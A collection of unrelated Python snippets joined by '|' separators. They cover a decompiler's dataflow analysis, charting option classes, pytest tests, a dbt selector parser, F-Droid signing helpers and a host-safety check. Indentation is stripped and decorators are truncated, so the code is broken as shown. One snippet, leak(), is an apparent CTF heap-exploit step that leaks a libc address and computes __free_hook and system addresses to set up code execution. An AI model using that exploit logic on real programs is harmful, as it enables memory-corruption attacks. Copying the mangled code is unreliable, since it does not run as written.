def _update_use_map(self, variable: Variable, instruction: Instruction):
pass
def _propagate_postponed_aliased_definitions(self):
pass
def _try_to_propagate_contractions(self, instruction: Instruction):
target = (instruction if (not isinstance(instruction, Assignment)) else instruction.value)
for subexpr in self._find_subexpressions(target):
if self._is_variable_contraction(subexpr):
if (definition := self._def_map.get(subexpr.operand)):
if (isinstance(definition, Assignment) and self._is_address_assignment(definition)):
continue
(defined_contraction, value) = (definition.destination, definition.value)
if (subexpr == defined_contraction):
instruction.substitute(subexpr, value.copy())
def _is_aliased_postponed_for_propagation(self, target: Instruction, definition: Assignment) -> bool:
if self._is_aliased_variable((aliased := definition.destination)):
if self._is_aliased_redefinition(aliased, target):
self._postponed_aliased.add(aliased)
return True
return False
def _is_invalid_propagation_into_address_operation(self, target: Instruction, definition: Assignment) -> bool:
if isinstance(target, Assignment):
subexpressions = list(self._find_subexpressions(target.destination))
subexpressions.extend((expr for expr in self._find_subexpressions(target.value)))
return any(((self._is_address(expr) and (expr.operand in self._find_subexpressions(definition.destination))) for expr in subexpressions))
elif isinstance(target, Return):
subexpressions = list(self._find_subexpressions(target))
return any(((self._is_address(expr) and (expr.operand in self._find_subexpressions(definition.destination))) for expr in subexpressions))
return False
def _operation_is_propagated_in_phi(self, target: Instruction, definition: Assignment) -> bool:
return (isinstance(target, Phi) and isinstance(definition.value, Operation))
def _is_address_assignment(self, definition: Assignment) -> bool:
return self._is_address(definition.value)
def _is_dereference_assignment(self, definition: Assignment) -> bool:
return any([self._is_dereference(x) for x in self._find_subexpressions(definition.value)])
def _is_address_into_dereference(self, definition: Assignment, target: Instruction) -> bool:
if self._is_address(definition.value):
for subexpr in target:
for sub in self._find_subexpressions(subexpr):
if (self._is_dereference(sub) and (sub.operand == definition.destination)):
return True
def _contains_aliased_variables(self, definition: Assignment) -> bool:
return any([self._is_aliased_variable(expr) for expr in self._find_subexpressions(definition)])
def _pointer_value_used_in_definition_could_be_modified_via_memory_access_between_definition_and_target(self, definition: Assignment, target: Instruction) -> bool:
for subexpr in self._find_subexpressions(definition.value):
if self._is_dereference(subexpr):
for variable in subexpr.requirements:
if (variable in self._pointers_info.points_to):
dangerous_uses = self._get_dangerous_uses_of_pointer(variable)
return self._has_any_of_dangerous_uses_between_definition_and_target(definition, target, dangerous_uses)
return False
def _definition_value_could_be_modified_via_memory_access_between_definition_and_target(self, definition: Assignment, target: Instruction) -> bool:
for aliased_variable in set(self._iter_aliased_variables(definition)):
dangerous_address_uses = self._get_dangerous_uses_of_variable_address(aliased_variable)
dangerous_pointer_uses = self._get_dangerous_uses_of_pointer_to_variable(aliased_variable)
if (dangerous_address_uses or dangerous_pointer_uses):
dangerous_uses = dangerous_pointer_uses.union(dangerous_address_uses)
if self._has_any_of_dangerous_uses_between_definition_and_target(definition, target, dangerous_uses):
return True
return False
def _has_any_of_dangerous_uses_between_definition_and_target(self, definition: Assignment, target: Instruction, dangerous_uses: Set[Instruction]) -> bool:
definition_block_info = self._blocks_map[str(definition)]
if (len(definition_block_info) == 0):
raise RuntimeError(f'No blocks found for definition {definition}')
if (len(definition_block_info) > 1):
raise RuntimeError(f'Same definition {definition} in multiple blocks')
(definition_block, definition_index) = list(definition_block_info)[0]
for (target_block, target_index) in self._blocks_map[str(target)]:
if (target_block == definition_block):
for use in dangerous_uses:
if (use in definition_block.instructions[definition_index:target_index]):
return True
else:
for use in dangerous_uses:
for (use_block, use_index) in self._blocks_map[str(use)]:
if (use_block == target_block):
if (use_index < target_index):
return True
elif (use_block == definition_block):
if (use_index > definition_index):
return True
elif (self._cfg.has_path(definition_block, use_block) and self._cfg.has_path(use_block, target_block)):
return True
return False
def _get_dangerous_uses_of_variable_address(self, var: Variable) -> Set[Instruction]:
dangerous_uses = set()
for use in self._use_map.get(var):
if (not self._is_call_assignment(use)):
continue
for subexpr in self._find_subexpressions(use):
if self._is_address(subexpr):
dangerous_uses.add(use)
break
return dangerous_uses
def _get_dangerous_uses_of_pointer_to_variable(self, var: Variable) -> Set[Instruction]:
is_pointed_by = self._pointers_info.is_pointed_by.get(var.name, set())
dangerous_uses = set()
for pointer in is_pointed_by:
dangerous_uses.update(self._get_dangerous_uses_of_pointer(pointer))
return dangerous_uses
def _get_dangerous_uses_of_pointer(self, pointer: Variable) -> Set[Instruction]:
dangerous_uses = set()
for use in self._use_map.get(pointer):
if (not isinstance(use, Assignment)):
continue
if (self._is_dereference(use.destination) and (pointer in use.destination.requirements)):
dangerous_uses.add(use)
elif (self._is_call_assignment(use) and (pointer in use.value.requirements)):
dangerous_uses.add(use)
return dangerous_uses
def _iter_aliased_variables(self, expression: DataflowObject) -> Iterator[Variable]:
for expression in self._find_subexpressions(expression):
if self._is_aliased_variable(expression):
(yield expression)
def _find_subexpressions(expression: DataflowObject) -> Iterator[Expression]:
todo = [expression]
while (todo and (subexpression := todo.pop())):
todo.extend(subexpression)
(yield subexpression)
def _is_phi(instruction: Instruction) -> bool:
return isinstance(instruction, Phi)
def _is_call_assignment(instruction: Instruction) -> bool:
return (isinstance(instruction, Assignment) and isinstance(instruction.value, Call))
def _defines_unknown_expression(instruction: Instruction) -> bool:
return (isinstance(instruction, Assignment) and isinstance(instruction.value, UnknownExpression))
def _is_address(expression: Expression) -> bool:
return (isinstance(expression, UnaryOperation) and (expression.operation == OperationType.address))
def _is_dereference(expression: Expression) -> bool:
return (isinstance(expression, UnaryOperation) and (expression.operation == OperationType.dereference))
def _is_aliased_variable(expression: Expression) -> bool:
return (isinstance(expression, Variable) and expression.is_aliased)
def _contains_global_variable(expression: Assignment) -> bool:
for expr in expression.destination.requirements:
if isinstance(expr, GlobalVariable):
return True
for expr in expression.value.requirements:
if isinstance(expr, GlobalVariable):
return True
return False
def _is_copy_assignment(instruction: Instruction) -> bool:
return (isinstance(instruction, Assignment) and (instruction.value.complexity == 1))
def _is_variable_contraction(expression: Expression) -> bool:
return (isinstance(expression, UnaryOperation) and (expression.operation == OperationType.cast) and expression.contraction and (expression.operand.complexity == 1))
def _is_aliased_redefinition(self, aliased_variable: Variable, instruction: Instruction):
return (isinstance(instruction, Assignment) and self._is_aliased_variable(instruction.destination) and self._is_aliased_variable(instruction.value) and (instruction.destination.name == aliased_variable.name == instruction.value.name)) |
def prepServers(dut_list, args, profile):
for dut in dut_list:
if (not dut.inLocalMode()):
startAoeServer(dut)
if (args.tunneling == 'y'):
startSshTunnel(dut)
fio_json_parser.tunnel2host[dut.sshTunnelPort] = dut.serverName
if dut.capacity:
dut.increment = int(((float(dut.capacity) / (2 ** 20)) / 32))
dut.offset = randint(0, dut.increment)
dut.numjobs *= args.job_scale
if (args.factor <= 0.0):
if (profile['scale_by_capacity'] != 'N'):
dut.factor = getMultiplier(dut.capacity)
else:
dut.factor = 1.0
else:
dut.factor = args.factor |
class OptionPlotoptionsErrorbarSonificationTracksMappingGapbetweennotes(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
.usefixtures('use_tmpdir')
def test_that_config_path_is_the_directory_of_the_main_ert_config():
os.mkdir('jobdir')
with open('jobdir/job_file', 'w', encoding='utf-8') as fout:
fout.write(dedent('\n EXECUTABLE echo\n ARGLIST <CONFIG_PATH>\n '))
with open('config_file.ert', 'w', encoding='utf-8') as fout:
fout.write('NUM_REALIZATIONS 1\n')
fout.write('INSTALL_JOB job_name jobdir/job_file\n')
fout.write('FORWARD_MODEL job_name')
ert_config = ErtConfig.from_file('config_file.ert')
assert (ert_config.forward_model_data_to_json('', 0, 0)['jobList'][0]['argList'] == [os.getcwd()]) |
def test_cast(base):
with pytest.raises(EtypeCastError):
cast(base.id, [], Etype.Image)
with pytest.raises(EtypeCastError):
cast(base.id, [base.txt1], Etype.Image)
t1 = cast(base.id, [base.im1], to=Etype.Image)
assert (len(t1.paths) == 1)
assert (t1.et == Etype.Image)
with pytest.raises(EtypeCastError):
cast(base.id, [])
i1 = cast(base.id, [base.im1])
assert (len(i1.paths) == 1)
assert (i1.et == Etype.Image)
i2 = cast(base.id, [base.im2])
assert (len(i2.paths) == 1)
assert (i2.et == Etype.Image)
ia1 = cast(base.id, [base.im1, base.im2])
assert (len(ia1.paths) == 2)
assert (ia1.et == Array(Etype.Image))
a1 = cast(base.id, base.aud1)
assert (len(a1.paths) == 1)
assert (a1.et == Etype.Audio)
ai1 = cast(base.id, [base.im3, base.aud1])
assert (len(ai1.paths) == 2)
assert (ai1.et == Union(Etype.Image, Etype.Audio))
ai2 = cast(base.id, [base.aud1, base.im2])
assert (len(ai1.paths) == 2)
assert (ai1.et == Union(Etype.Image, Etype.Audio))
iaa1 = cast(base.id, [base.im1, base.im2, base.aud1])
assert (len(iaa1.paths) == 3)
assert (iaa1.et == Union(Array(Etype.Image), Etype.Audio))
any1 = cast(base.id, [base.im1, base.im2, base.aud1, base.txt1])
assert (len(any1.paths) == 4)
assert (any1.et == Etype.Any) |
class TestMostCommonValueShare(BaseFeatureDataQualityMetricsTest):
name: ClassVar = 'Share of the Most Common Value'
def get_stat(self, current: NumericCharacteristics):
return current.most_common_percentage
def get_condition_from_reference(self, reference: Optional[ColumnCharacteristics]) -> TestValueCondition:
if (reference is not None):
if (not isinstance(reference, (NumericCharacteristics, CategoricalCharacteristics, DatetimeCharacteristics))):
raise ValueError(f'{self.column_name} should be numerical, categorical or datetime')
most_common_percentage = reference.most_common_percentage
if (most_common_percentage is not None):
return TestValueCondition(eq=approx((most_common_percentage / 100.0), relative=0.1))
return TestValueCondition(lt=0.8)
def calculate_value_for_test(self) -> Optional[Numeric]:
features_stats = self.metric.get_result().current_characteristics
if isinstance(features_stats, TextCharacteristics):
raise ValueError(f'{self.column_name} should be numerical, categorical or datetime')
most_common_percentage = features_stats.most_common_percentage
if (most_common_percentage is None):
return None
return (most_common_percentage / 100.0)
def get_description(self, value: Numeric) -> str:
counts_data = self.metric.get_result().plot_data.counts_of_values
if (counts_data is None):
raise ValueError('counts_of_values should be provided')
most_common_value = counts_data['current'].iloc[(0, 0)]
return f'The most common value in the column **{self.column_name}** is {most_common_value}. Its share is {value:.3g}. The test threshold is {self.get_condition()}.'
def get_parameters(self) -> ColumnCheckValueParameters:
return ColumnCheckValueParameters(column_name=self.column_name.display_name, condition=self.get_condition(), value=self._value) |
def deny_unsafe_hosts(host: str) -> str:
if CONFIG.dev_mode:
return host
try:
host_ip: Union[(IPv4Address, IPv6Address)] = ip_address(socket.gethostbyname(host))
except socket.gaierror:
raise ValueError(f'Failed to resolve hostname: {host}')
if (host_ip.is_link_local or host_ip.is_loopback):
raise ValueError(f"Host '{host}' with IP Address '{host_ip}' is not safe!")
return host |
class TableEditorToolbar(HasPrivateTraits):
no_sort = Instance(Action, {'name': 'No Sorting', 'tooltip': 'Do not sort columns', 'action': 'on_no_sort', 'enabled': False, 'image': ImageResource('table_no_sort.png')})
move_up = Instance(Action, {'name': 'Move Up', 'tooltip': 'Move current item up one row', 'action': 'on_move_up', 'enabled': False, 'image': ImageResource('table_move_up.png')})
move_down = Instance(Action, {'name': 'Move Down', 'tooltip': 'Move current item down one row', 'action': 'on_move_down', 'enabled': False, 'image': ImageResource('table_move_down.png')})
search = Instance(Action, {'name': 'Search', 'tooltip': 'Search table', 'action': 'on_search', 'image': ImageResource('table_search.png')})
add = Instance(Action, {'name': 'Add', 'tooltip': 'Insert new item', 'action': 'on_add', 'image': ImageResource('table_add.png')})
delete = Instance(Action, {'name': 'Delete', 'tooltip': 'Delete current item', 'action': 'on_delete', 'enabled': False, 'image': ImageResource('table_delete.png')})
prefs = Instance(Action, {'name': 'Preferences', 'tooltip': 'Set user preferences for table', 'action': 'on_prefs', 'image': ImageResource('table_prefs.png')})
editor = Instance(TableEditor)
control = Any()
def __init__(self, parent=None, **traits):
super().__init__(**traits)
editor = self.editor
factory = editor.factory
actions = []
if (factory.sortable and (not factory.sort_model)):
actions.append(self.no_sort)
if ((not editor.in_column_mode) and factory.reorderable):
actions.append(self.move_up)
actions.append(self.move_down)
if (editor.in_row_mode and (factory.search is not None)):
actions.append(self.search)
if factory.editable:
if ((factory.row_factory is not None) and (not factory.auto_add)):
actions.append(self.add)
if (factory.deletable and (not editor.in_column_mode)):
actions.append(self.delete)
if factory.configurable:
actions.append(self.prefs)
if (len(actions) > 0):
toolbar = ToolBar(*actions, image_size=(16, 16), show_tool_names=False, show_divider=False)
self.control = toolbar.create_tool_bar(parent, self)
self.control.SetBackgroundColour(parent.GetBackgroundColour())
self.control.SetSize(wx.Size((23 * len(actions)), 16))
def add_to_menu(self, menu_item):
pass
def add_to_toolbar(self, toolbar_item):
pass
def can_add_to_menu(self, action):
return True
def can_add_to_toolbar(self, action):
return True
def perform(self, action, action_event=None):
getattr(self.editor, action.action)() |
def add_types_to_namespaces(files, pkg, pkg_module):
for file in files:
add_after_namespaces = []
for child in file['children']:
simple_name = child['name'].split('::')[0]
if (child['kind'] == 'namespace'):
entity = getattr(cppyy.gbl, simple_name)
if (getattr(entity, '__module__', None) == 'cppyy.gbl'):
setattr(entity, '__module__', pkg)
setattr(pkg_module, simple_name, entity)
else:
add_after_namespaces.append(child)
for child in add_after_namespaces:
simple_name = child['name'].split('::')[0]
if (child['kind'] == 'enum'):
for enum_value in child['enumerations']:
enum_value_name = enum_value['name']
entity = getattr(cppyy.gbl, enum_value_name)
setattr(entity, '__module__', (pkg + '.ImGui'))
setattr(pkg_module.ImGui, enum_value_name, entity)
elif ((child['kind'] not in ('typedef', 'function')) and simple_name.startswith('Im')):
entity = getattr(cppyy.gbl, simple_name)
setattr(entity, '__module__', (pkg + '.ImGui'))
setattr(pkg_module.ImGui, simple_name, entity) |
class OptionPlotoptionsPolygonSonificationTracksMappingLowpassResonance(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class VectorEnv(BaseEnv, ABC):
def __init__(self, n_envs: int):
self.n_envs = n_envs
def step(self, actions: ActionType) -> Tuple[(ObservationType, np.ndarray, np.ndarray, Iterable[Dict[(Any, Any)]])]:
def reset(self):
def seed(self, seeds: List[Any]) -> None:
def _get_indices(self, indices):
if (indices is None):
indices = range(self.n_envs)
elif isinstance(indices, int):
indices = [indices]
return indices |
def CreateTable(connection, table_name):
create_table_statement = 'CREATE TABLE IF NOT EXISTS {}(id INTEGER NOT NULL AUTO_INCREMENT,category VARCHAR(50) NOT NULL,time_of_entry DATETIME,runid VARCHAR(50),envoy_hash VARCHAR(40),total_time INTEGER UNSIGNED,time_for_1st_byte_max INTEGER UNSIGNED,time_for_1st_byte_min INTEGER UNSIGNED,time_for_1st_byte_mean INTEGER UNSIGNED,time_for_1st_byte_sd INTEGER UNSIGNED,time_for_1st_byte_sd_percent FLOAT UNSIGNED,requests_success BIGINT UNSIGNED,requests_started BIGINT UNSIGNED,requests_done BIGINT UNSIGNED,requests_timeout BIGINT UNSIGNED,requests_error BIGINT UNSIGNED,requests_fail BIGINT UNSIGNED,requests_total BIGINT UNSIGNED,total_data_BPS DOUBLE UNSIGNED,time_for_connect_max INTEGER UNSIGNED,time_for_connect_min INTEGER UNSIGNED,time_for_connect_mean INTEGER UNSIGNED,time_for_connect_sd INTEGER UNSIGNED,time_for_connect_sd_percent FLOAT UNSIGNED,req_per_sec_max INTEGER UNSIGNED,req_per_sec_min INTEGER UNSIGNED,req_per_sec_mean INTEGER UNSIGNED,req_per_sec_sd INTEGER UNSIGNED,req_per_sec_sd_percent FLOAT UNSIGNED,total_req_per_sec DOUBLE UNSIGNED,time_for_request_max INTEGER UNSIGNED,time_for_request_min INTEGER UNSIGNED,time_for_request_mean INTEGER UNSIGNED,time_for_request_sd INTEGER UNSIGNED,time_for_request_sd_percent FLOAT UNSIGNED,status_codes_2xx BIGINT UNSIGNED,status_codes_3xx BIGINT UNSIGNED,status_codes_4xx BIGINT UNSIGNED,status_codes_5xx BIGINT UNSIGNED,traffic_total_bytes BIGINT UNSIGNED,traffic_total_data_bytes BIGINT UNSIGNED,traffic_total_headers_bytes BIGINT UNSIGNED,traffic_total_savings FLOAT UNSIGNED,PRIMARY KEY (id))'
db_utils.ExecuteAndReturnResult(connection, create_table_statement.format(table_name)) |
('slanted_triangular.v1')
def slanted_triangular(max_rate: float, num_steps: int, *, cut_frac: float=0.1, ratio: int=32, decay: float=1.0, t: float=0.0) -> Iterable[float]:
cut = int((num_steps * cut_frac))
while True:
t += 1
if (t < cut):
p = (t / cut)
else:
p = (1 - ((t - cut) / (cut * ((1 / cut_frac) - 1))))
learn_rate = ((max_rate * (1 + (p * (ratio - 1)))) * (1 / ratio))
(yield learn_rate) |
(scope='function')
def policy_drp_action_erasure(db: Session, oauth_client: ClientDetail) -> Generator:
erasure_request_policy = Policy.create(db=db, data={'name': 'example erasure request policy drp', 'key': 'example_erasure_request_policy_drp', 'drp_action': 'deletion', 'client_id': oauth_client.id})
erasure_request_rule = Rule.create(db=db, data={'action_type': ActionType.erasure.value, 'client_id': oauth_client.id, 'name': 'Erasure Request Rule DRP', 'policy_id': erasure_request_policy.id, 'masking_strategy': {'strategy': StringRewriteMaskingStrategy.name, 'configuration': {'rewrite_value': 'MASKED'}}})
rule_target = RuleTarget.create(db=db, data={'client_id': oauth_client.id, 'data_category': DataCategory('user').value, 'rule_id': erasure_request_rule.id})
(yield erasure_request_policy)
try:
rule_target.delete(db)
except ObjectDeletedError:
pass
try:
erasure_request_rule.delete(db)
except ObjectDeletedError:
pass
try:
erasure_request_policy.delete(db)
except ObjectDeletedError:
pass |
class OptionSeriesTreegraphSonificationDefaultinstrumentoptionsMappingLowpassResonance(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class Primitive(metaclass=abc.ABCMeta):
def __init__(self, indices, periodic=False, calc_kwargs=None, cache=False):
self.indices = list(indices)
self.periodic = periodic
if (calc_kwargs is None):
calc_kwargs = ()
self.calc_kwargs = calc_kwargs
self.cache = cache
self.logger = logging.getLogger('internal_coords')
self.val_cache = {}
self.grad_cache = {}
def log(self, msg, lvl=logging.DEBUG):
self.logger.log(lvl, msg)
def log_dbg(self, msg):
self.log(msg, lvl=logging.DEBUG)
def parallel(u, v, thresh=1e-06):
dot = (u.dot(v) / (norm3(u) * norm3(v)))
return ((1 - abs(dot)) < thresh)
def _get_cross_vec(coords3d, indices):
(m, o, n) = indices
x_dash = (coords3d[n] - coords3d[m])
x = (x_dash / norm3(x_dash))
cross_vecs = np.eye(3)
min_ind = np.argmin([(np.dot(cv, x) ** 2) for cv in cross_vecs])
return cross_vecs[min_ind]
def set_cross_vec(self, coords3d, indices):
self.cross_vec = self._get_cross_vec(coords3d, self.indices)
self.log(f'Cross vector for {self} set to {self.cross_vec}')
def _calculate(*, coords3d, indices, gradient, **kwargs):
pass
def _weight(self, atoms, coords3d, indices, f_damping):
pass
def weight(self, atoms, coords3d, f_damping=0.12):
return self._weight(atoms, coords3d, self.indices, f_damping)
def rho(atoms, coords3d, indices):
(i, j) = indices
distance = norm3((coords3d[i] - coords3d[j]))
cov_rad_sum = (CR[atoms[i].lower()] + CR[atoms[j].lower()])
return exp((- ((distance / cov_rad_sum) - 1)))
def calculate(self, coords3d, indices=None, gradient=False):
if (indices is None):
indices = self.indices
if self.cache:
cur_hash = hash_arr(coords3d[indices], precision=8)
try:
val = self.val_cache[cur_hash]
if gradient:
grad = self.grad_cache[cur_hash]
self.log_dbg(f"Returning cached value & gradient for hash '{cur_hash}'.")
return (val, grad)
else:
self.log_dbg(f"Returning cached value for hash '{cur_hash}'.")
return val
except KeyError:
self.log_dbg(f"Hash '{cur_hash}' is not yet cached.")
calc_kwargs = {key: getattr(self, key) for key in self.calc_kwargs}
results = self._calculate(coords3d=coords3d, indices=indices, gradient=gradient, **calc_kwargs)
if self.cache:
if gradient:
(val, grad) = results
self.val_cache[cur_hash] = val
self.grad_cache[cur_hash] = grad
else:
self.val_cache[cur_hash] = results
return results
def jacobian(self, coords3d, indices=None):
if (indices is None):
indices = self.indices
calc_kwargs = {key: getattr(self, key) for key in self.calc_kwargs}
return self._jacobian(coords3d=coords3d, indices=indices, **calc_kwargs)
def __str__(self):
return f'{self.__class__.__name__}({self.indices})'
def __repr__(self):
return self.__str__() |
def clipper(bbox):
(minx, miny, maxx, maxy) = bbox
bounds = {'type': 'Polygon', 'coordinates': [[(minx, miny), (minx, maxy), (maxx, maxy), (maxx, miny), (minx, miny)]]}
try:
bbox_shape = shape(bounds)
def func(geometry):
try:
clipped = bbox_shape.intersection(shape(geometry))
except (ValueError, TopologicalError):
return geometry
return mapping(clipped)
except NameError:
def func(geometry):
return geometry
return func |
def leak():
global free_hook_addr
global system_addr
for i in range(9):
build(('A' * 7))
for i in range(7):
destroy(i)
destroy(7)
blow_up()
for i in range(8):
build(('A' * 7))
visit()
leak = u64(io.recvuntil('Type[7]', drop=True)[(- 6):].ljust(8, '\x00'))
libc_base = (leak - 3849336)
free_hook_addr = (libc_base + libc.symbols['__free_hook'])
system_addr = (libc_base + libc.symbols['system'])
log.info(('libc base: 0x%x' % libc_base))
log.info(('__free_hook address: 0x%x' % free_hook_addr))
log.info(('system address: 0x%x' % system_addr)) |
def klippa_receipt_parser(original_response: dict) -> ReceiptParserDataClass:
data_response = original_response['data']
customer_information = CustomerInformation(customer_name=data_response['customer_name'])
merchant_information = MerchantInformation(merchant_name=data_response['merchant_name'], merchant_address=data_response['merchant_address'], merchant_phone=data_response['merchant_phone'], merchant_tax_id=data_response['merchant_vat_number'], merchant_siret=data_response['merchant_coc_number'], merchant_url=data_response['merchant_website'])
locale_information = Locale(currency=data_response['currency'], language=data_response['document_language'], country=data_response['merchant_country_code'])
taxes_information = Taxes(rate=data_response['personal_income_tax_rate'], taxes=data_response['personal_income_tax_amount'])
payment_information = PaymentInformation(card_type=data_response['paymentmethod'], card_number=data_response['payment_card_number'])
item_lines: List[ItemLines] = []
for line in data_response.get('lines', []):
for lineitem in line.get('linetimes', []):
item_lines.append(ItemLines(description=lineitem['description'], quantity=lineitem['quantity'], unit_price=lineitem['amount_each'], amount=lineitem['amount']))
info_receipt = [InfosReceiptParserDataClass(customer_information=customer_information, merchant_information=merchant_information, locale=locale_information, taxes=[taxes_information], payment_information=payment_information, invoice_number=data_response['invoice_number'], date=data_response['date'], invoice_total=data_response['amount'])]
return ReceiptParserDataClass(extracted_data=info_receipt) |
class SelectorFilter():
def __init__(self, config: Config, tracking: Optional[Tracking], selector: Optional[str]=None) -> None:
self.tracking = tracking
self.selector = selector
user_dbt_runner = self._create_user_dbt_runner(config)
self.selector_fetcher = (SelectorFetcher(user_dbt_runner) if user_dbt_runner else None)
self.filter = self._parse_selector(self.selector)
def _parse_selector(self, selector: Optional[str]=None) -> FiltersSchema:
data_monitoring_filter = FiltersSchema()
if selector:
if (self.selector_fetcher and self._can_use_fetcher(selector)):
if self.tracking:
self.tracking.set_env('select_method', 'dbt selector')
node_names = self.selector_fetcher.get_selector_results(selector=selector)
return FiltersSchema(node_names=node_names, selector=selector)
else:
invocation_id_regex = re.compile('invocation_id:(.*)')
invocation_time_regex = re.compile('invocation_time:(.*)')
last_invocation_regex = re.compile('last_invocation')
tag_regex = re.compile('tag:(.*)')
owner_regex = re.compile('config.meta.owner:(.*)')
model_regex = re.compile('model:(.*)')
statuses_regex = re.compile('statuses:(.*)')
resource_types_regex = re.compile('resource_types:(.*)')
invocation_id_match = invocation_id_regex.search(selector)
invocation_time_match = invocation_time_regex.search(selector)
last_invocation_match = last_invocation_regex.search(selector)
tag_match = tag_regex.search(selector)
owner_match = owner_regex.search(selector)
model_match = model_regex.search(selector)
statuses_match = statuses_regex.search(selector)
resource_types_match = resource_types_regex.search(selector)
if last_invocation_match:
if self.tracking:
self.tracking.set_env('select_method', 'last_invocation')
data_monitoring_filter = FiltersSchema(last_invocation=True, selector=selector)
elif invocation_id_match:
if self.tracking:
self.tracking.set_env('select_method', 'invocation_id')
data_monitoring_filter = FiltersSchema(invocation_id=invocation_id_match.group(1), selector=selector)
elif invocation_time_match:
if self.tracking:
self.tracking.set_env('select_method', 'invocation_time')
data_monitoring_filter = FiltersSchema(invocation_time=invocation_time_match.group(1), selector=selector)
elif tag_match:
if self.tracking:
self.tracking.set_env('select_method', 'tag')
data_monitoring_filter = FiltersSchema(tags=[FilterSchema(values=[tag_match.group(1)])], selector=selector)
elif owner_match:
if self.tracking:
self.tracking.set_env('select_method', 'owner')
data_monitoring_filter = FiltersSchema(owners=[FilterSchema(values=[owner_match.group(1)])], selector=selector)
elif model_match:
if self.tracking:
self.tracking.set_env('select_method', 'model')
data_monitoring_filter = FiltersSchema(models=[FilterSchema(values=[model_match.group(1)])], selector=selector)
elif statuses_match:
if self.tracking:
self.tracking.set_env('select_method', 'statuses')
statuses = [Status(status) for status in statuses_match.group(1).split(',')]
data_monitoring_filter = FiltersSchema(statuses=[StatusFilterSchema(values=statuses)], selector=selector)
elif resource_types_match:
if self.tracking:
self.tracking.set_env('select_method', 'resource_types')
resource_types = [ResourceType(resource_type) for resource_type in resource_types_match.group(1).split(',')]
data_monitoring_filter = FiltersSchema(resource_types=[ResourceTypeFilterSchema(values=resource_types)], selector=selector)
else:
logger.error(f'Could not parse the given -s/--select: {selector}')
return FiltersSchema(selector=selector, statuses=[])
return data_monitoring_filter
def _create_user_dbt_runner(self, config: Config) -> Optional[DbtRunner]:
if config.project_dir:
return DbtRunner(config.project_dir, config.profiles_dir, config.project_profile_target, env_vars=config.env_vars)
else:
return None
def get_filter(self) -> FiltersSchema:
return self.filter
def _can_use_fetcher(selector):
non_dbt_selectors = ['last_invocation', 'invocation_id', 'invocation_time', 'statuses', 'resource_types']
return all([(selector_type not in selector) for selector_type in non_dbt_selectors]) |
.parametrize('service', BACKEND_SERVICES)
.usefixtures('frappe_site')
def test_frappe_connections_in_backends(service: str, python_path: str, compose: Compose):
filename = '_ping_frappe_connections.py'
compose('cp', f'tests/{filename}', f'{service}:/tmp/')
compose.exec('-w', '/home/frappe/frappe-bench/sites', service, python_path, f'/tmp/{filename}') |
def store_stats_fdroid_signing_key_fingerprints(appids, indent=None):
if (not os.path.exists('stats')):
os.makedirs('stats')
data = OrderedDict()
fps = read_fingerprints_from_keystore()
for appid in sorted(appids):
alias = key_alias(appid)
if (alias in fps):
data[appid] = {'signer': fps[key_alias(appid)]}
jar_file = os.path.join('stats', 'publishsigkeys.jar')
with zipfile.ZipFile(jar_file, 'w', zipfile.ZIP_DEFLATED) as jar:
jar.writestr('publishsigkeys.json', json.dumps(data, indent=indent))
sign_sig_key_fingerprint_list(jar_file) |
class GraphSlice():
def __init__(self, t_cfg: TransitionCFG, source: TransitionBlock, sink: TransitionBlock):
assert t_cfg.is_acyclic(), 'The given transition cfg is not a directed acyclic graph, therefore we can not compute the graph slice!'
self._t_cfg: TransitionCFG = t_cfg
self._source: TransitionBlock = source
self._sink: TransitionBlock = sink
self._graph_slice = TransitionCFG()
def compute_graph_slice_for_region(cls, t_cfg: TransitionCFG, source: TransitionBlock, region: Set[TransitionBlock], back_edges: bool=True) -> TransitionCFG:
sink_nodes = GraphSlice._sink_nodes(t_cfg, region)
return GraphSlice.compute_graph_slice_for_sink_nodes(t_cfg, source, sink_nodes, back_edges)
def compute_graph_slice_for_sink_nodes(cls, t_cfg: TransitionCFG, source: TransitionBlock, sink_nodes: List[TransitionBlock], back_edges: bool=True) -> TransitionCFG:
graph = TransitionCFG()
graph.add_edges_from([edge for edge in t_cfg.edges if (back_edges or (edge.property == EdgeProperty.non_loop))])
graph.root = source
virtual_node = graph.create_ast_block()
instance = cls(graph, source, virtual_node)
instance._add_virtual_sink_node(virtual_node, sink_nodes)
instance._compute_graph_slice_for_single_sink_node()
instance._graph_slice.remove_node(virtual_node)
instance._graph_slice.condition_handler = t_cfg.condition_handler
return instance._graph_slice
def _sink_nodes(t_cfg, region: Set[TransitionBlock]) -> List[TransitionBlock]:
sink_nodes = []
for node in region:
successors = t_cfg.get_successors(node)
if (len(successors) == 0):
sink_nodes.append(node)
for succ in successors:
if (succ not in region):
sink_nodes.append(node)
break
return sink_nodes
def _compute_graph_slice_for_single_sink_node(self) -> None:
if (self._source == self._sink):
self._graph_slice.add_node(self._source)
return
graph_slice_nodes = self._get_graph_slice_nodes()
self._construct_graph_slice_with_nodes(graph_slice_nodes)
self._graph_slice.root = self._source
def _get_graph_slice_nodes(self) -> Iterator[TransitionBlock]:
reachable_from_source: Iterator[TransitionBlock] = self._t_cfg.iter_postorder(self._source)
reverse_graph = self._construct_reverse_graph_for(reachable_from_source)
return reverse_graph.iter_postorder(self._sink)
def _construct_graph_slice_with_nodes(self, graph_slice_nodes: Iterator[TransitionBlock]) -> None:
self._graph_slice.add_nodes_from(graph_slice_nodes)
for node in self._graph_slice:
for predecessor in self._t_cfg.get_predecessors(node):
